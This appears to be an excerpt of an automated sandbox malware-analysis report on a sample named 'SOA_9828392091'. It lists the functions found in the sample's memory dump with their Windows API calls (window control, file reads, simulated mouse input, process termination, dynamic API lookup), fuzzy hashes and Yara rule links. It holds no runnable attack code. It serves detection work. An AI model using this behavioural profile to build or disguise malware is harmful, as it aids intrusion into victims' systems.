                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 2592858361-0
                                      • Opcode ID: 1093f02f46ceddf56592bd9c1f16ecb105722d129d9dd41e475f564b3a58eba8
                                      • Instruction ID: ff37ecbf5d3472f81d31d96d99da380cfdf6fae0c5219479094d44b1ad51d65f
                                      • Opcode Fuzzy Hash: 1093f02f46ceddf56592bd9c1f16ecb105722d129d9dd41e475f564b3a58eba8
                                      • Instruction Fuzzy Hash: 8441B071109301DFC710DF24CC84FBA7BA8EB59331F040669F9A4872E1D7319845EBA2
                                      Function 0099E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(009F1628,00000000,009F1628,00000000,00000000,009F1628,?,009ADC5D,00000000,?,00000000,00000000,00000000,?,009ADAD1,00000004), ref: 0099E40B
                                      • EnableWindow.USER32(00000000,00000000), ref: 0099E42F
                                      • ShowWindow.USER32(009F1628,00000000), ref: 0099E48F
                                      • ShowWindow.USER32(00000000,00000004), ref: 0099E4A1
                                      • EnableWindow.USER32(00000000,00000001), ref: 0099E4C5
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0099E4E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 4660e2151cf0e78810aee9623a73fc0b7dbd443655785a768af4c16d17dfdf89
                                      • Instruction ID: 9e686f36e9eba7742b10c6178b42f8dd96a885331f159a2377076fe9023a42c1
                                      • Opcode Fuzzy Hash: 4660e2151cf0e78810aee9623a73fc0b7dbd443655785a768af4c16d17dfdf89
                                      • Instruction Fuzzy Hash: 93416D34605141EFDF22CF28C599B947BE5BF09714F1881A9EA588F2B2C732E842CB61
                                      Function 009798BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 009798D1
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00979908
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00979924
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0097999E
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009799B3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 009799D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 2537439066-0
                                      • Opcode ID: 67e9c710247f655e88bef4b2ada516b81d3d1451d99e3dcbf248e2510fb79ee2
                                      • Instruction ID: 2133f195eef4190e1ffb23ced0160e7b3d2e988356e44bb6c69b3e734aed8d23
                                      • Opcode Fuzzy Hash: 67e9c710247f655e88bef4b2ada516b81d3d1451d99e3dcbf248e2510fb79ee2
                                      • Instruction Fuzzy Hash: AF315032A00105EBDB109FA4DD85E6BB778FF85310B1481B9F904AB256DB70DE10DBA0
                                      Function 00989B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,009877F4,?,?,00000000,00000001), ref: 00989B53
                                        • Part of subcall function 00986544: GetWindowRect.USER32(?,?), ref: 00986557
                                      • GetDesktopWindow.USER32 ref: 00989B7D
                                      • GetWindowRect.USER32(00000000), ref: 00989B84
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00989BB6
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      • GetCursorPos.USER32(?), ref: 00989BE2
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00989C44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 3e2e13449935b4fa85552aa2ab05f28889ccd1bc3f12fa119b5d9f4c0bb65702
                                      • Instruction ID: ad5000d0024efab76c4d969cd84418429194851e5834810c69cd47fa10c5c3dd
                                      • Opcode Fuzzy Hash: 3e2e13449935b4fa85552aa2ab05f28889ccd1bc3f12fa119b5d9f4c0bb65702
                                      • Instruction Fuzzy Hash: 6D31C372108305AFD710DF54D849F9AB7EDFF85314F040A29F589D7281E671EA04CB91
                                      Function 009816DA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • _wcstok.LIBCMT ref: 0098184E
                                      • _wcscpy.LIBCMT ref: 009818DD
                                      • _memset.LIBCMT ref: 00981910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: f4852d9a72e6e588634767ac50f6631534b320145d987470e8dea353b9a964bf
                                      • Instruction ID: ecab4f37b5b16e973b5fccdf74a26fce87e2772d7f98fea24d54278bc7f21f38
                                      • Opcode Fuzzy Hash: f4852d9a72e6e588634767ac50f6631534b320145d987470e8dea353b9a964bf
                                      • Instruction Fuzzy Hash: D4C15A716083419FC724EF64C895B9AB7E8AF85350F00492DF89A973A2DB30ED05CF82
                                      Function 0099EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                        • Part of subcall function 0094AF83: BeginPath.GDI32(?), ref: 0094B009
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094B033
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0099EC20
                                      • LineTo.GDI32(00000000,00000003,?), ref: 0099EC34
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099EC42
                                      • LineTo.GDI32(00000000,00000000,?), ref: 0099EC52
                                      • EndPath.GDI32(00000000), ref: 0099EC62
                                      • StrokePath.GDI32(00000000), ref: 0099EC72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 7ac8b65cb70fdb719a270948b1477c4ee40ee9d39aa3b4fe58d4ecfdb68e7840
                                      • Instruction ID: 788420f74779e24cfdbc4d192db9cc35629f94e5ea3450bf80de5505ab04a4bd
                                      • Opcode Fuzzy Hash: 7ac8b65cb70fdb719a270948b1477c4ee40ee9d39aa3b4fe58d4ecfdb68e7840
                                      • Instruction Fuzzy Hash: BA110972005149BFEF029F94DD88EEA7F6DEB08360F048112FE4899160E7719D55EBA0
                                      Function 0096E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0096E1C0
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0096E1D1
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0096E1D8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0096E1E0
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0096E1F7
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0096E209
                                        • Part of subcall function 00969AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00969A05,00000000,00000000,?,00969DDB), ref: 0096A53A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                      • String ID:
                                      • API String ID: 603618608-0
                                      • Opcode ID: 9b4a406174823ac9ba701ac0ae853a26b48c7e79d67755d7f9301f3d004e4ab5
                                      • Instruction ID: 8d6c2f7a42c211ffae151312768c2232ac27a9287b1fc1909711d390b5f976b2
                                      • Opcode Fuzzy Hash: 9b4a406174823ac9ba701ac0ae853a26b48c7e79d67755d7f9301f3d004e4ab5
                                      • Instruction Fuzzy Hash: 40018FB9A04214BFEB109BA68D45B5EBFB8EB48761F004166EE04A7290E6709C00DFA0
                                      Function 00957B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __init_pointers.LIBCMT ref: 00957B47
                                        • Part of subcall function 0095123A: __initp_misc_winsig.LIBCMT ref: 0095125E
                                        • Part of subcall function 0095123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00957F51
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00957F65
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00957F78
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00957F8B
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00957F9E
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00957FB1
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00957FC4
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00957FD7
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00957FEA
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00957FFD
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00958010
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00958023
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00958036
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00958049
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0095805C
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0095806F
                                      • __mtinitlocks.LIBCMT ref: 00957B4C
                                        • Part of subcall function 00957E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009EAC68,00000FA0,?,?,00957B51,00955E77,009E6C70,00000014), ref: 00957E41
                                      • __mtterm.LIBCMT ref: 00957B55
                                        • Part of subcall function 00957BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00957D3F
                                        • Part of subcall function 00957BBD: _free.LIBCMT ref: 00957D46
                                        • Part of subcall function 00957BBD: RtlDeleteCriticalSection.NTDLL(009EAC68), ref: 00957D68
                                      • __calloc_crt.LIBCMT ref: 00957B7A
                                      • GetCurrentThreadId.KERNEL32 ref: 00957BA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                      • String ID:
                                      • API String ID: 2942034483-0
                                      • Opcode ID: 084163a0d54881ab45682b45866d47a533d2758e2b6d3e138cfea9582c358f8e
                                      • Instruction ID: 22362ed2bafdbfc2815cbd6c35a114f8fdd7554982fad7dc23ee92d009c52cfe
                                      • Opcode Fuzzy Hash: 084163a0d54881ab45682b45866d47a533d2758e2b6d3e138cfea9582c358f8e
                                      • Instruction Fuzzy Hash: 35F0963211D3621AE624F7F77C4774AA6889F41737B2006A9FC64D50E1FF249A494361
                                      Function 009327EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0093281D
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00932825
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00932830
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0093283B
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00932843
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093284B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 0bd7141e932ec85cec576bea736d73ff1927da07f38c2e048c4eaef5a7a88575
                                      • Instruction ID: b65899c61ca431a8e9ab9d014f8d5a49366e37b1d5827b255de6f8d473f7f85f
                                      • Opcode Fuzzy Hash: 0bd7141e932ec85cec576bea736d73ff1927da07f38c2e048c4eaef5a7a88575
                                      • Instruction Fuzzy Hash: 510167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00421BA15C47A42C7F5A864CBE5
                                      Function 00979AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 1423608774-0
                                      • Opcode ID: f1bee1b1144f4b88f7a1e2d633eac355313e65eb09c3df43ba91da6432a00190
                                      • Instruction ID: 9c2ef5e822620b67bf2c4a0b7da320952ce9c6eccecd7c2751b58b9dbd02f217
                                      • Opcode Fuzzy Hash: f1bee1b1144f4b88f7a1e2d633eac355313e65eb09c3df43ba91da6432a00190
                                      • Instruction Fuzzy Hash: 1E01A437217212ABDB196B64EE49EEB7779FFC8711B044639F507921A0EB749800EB50
                                      Function 00977BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00977C07
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00977C1D
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00977C2C
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C3B
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C45
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 2adb3a99df70eba1c5bfb2d82cf10e621fbdaef9cf24adcb17300c6e1c02c293
                                      • Instruction ID: a99d0b37106d5c119cc8f966971743fc4654fe2fa7ba8adb1f69b68a9ea676a9
                                      • Opcode Fuzzy Hash: 2adb3a99df70eba1c5bfb2d82cf10e621fbdaef9cf24adcb17300c6e1c02c293
                                      • Instruction Fuzzy Hash: B6F0B472116158BFE72517529D0DEEF7F7CDFC6B25F000118FA01D1051E7A01A41E6B5
                                      Function 00979A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00979A33
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00979A44
                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 00979A51
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 00979A5E
                                        • Part of subcall function 009793D1: CloseHandle.KERNEL32(?,?,00979A6B,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 009793DB
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00979A71
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00979A78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: d6e77be561feb63db3a0527db8d4dfa0f678a514d78580c5a58bd47f7b870879
                                      • Instruction ID: b9fe4dbe66c8d7c0a19d4d015b78889187d2e523b9204ce1c9662ca9f3bc285f
                                      • Opcode Fuzzy Hash: d6e77be561feb63db3a0527db8d4dfa0f678a514d78580c5a58bd47f7b870879
                                      • Instruction Fuzzy Hash: 83F0E23715B201ABD7152BA4EE8DEEB3739FF84321B040225F203910A0EB749800EB50
                                      Function 00931CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • __swprintf.LIBCMT ref: 00931EA6
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00931D49
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
